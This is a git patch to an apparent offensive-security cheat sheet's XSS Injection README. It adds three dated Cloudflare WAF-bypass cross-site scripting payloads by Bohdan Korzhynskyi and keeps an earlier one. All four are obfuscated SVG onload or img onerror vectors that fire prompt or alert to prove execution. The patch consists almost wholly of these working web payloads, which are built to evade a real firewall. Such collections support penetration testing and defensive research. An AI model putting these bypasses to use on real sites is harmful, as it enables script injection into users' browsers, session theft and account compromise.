From c4af354d8f410caeebbe9dc5fc8172107cc8733b Mon Sep 17 00:00:00 2001
From: bohdansec <51418565+bohdansec@users.noreply.github.com>
Date: Wed, 22 Apr 2020 00:51:36 +0300
Subject: [PATCH] Update Cloudflare XSS bypasses

Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
---
 XSS Injection/README.md | 22 +++++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 1fe19782..8b46e60d 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`
 
 ## Common WAF Bypass
 
-### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
+### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+
+#### 21st april 2020
+
+```html
+<svg/OnLoad="`${prompt``}`">
+```
+
+#### 22nd august 2019
+
+```html
+<svg/onload=%26nbsp;alert`bohdan`+
+```
+
+#### 5th jule 2019
+
+```html
+1'"><img/src/onerror=.1|alert``>
+```
+
+#### 3rd june 2019
 
 ```html
 <svg onload=prompt%26%230000000040document.domain)>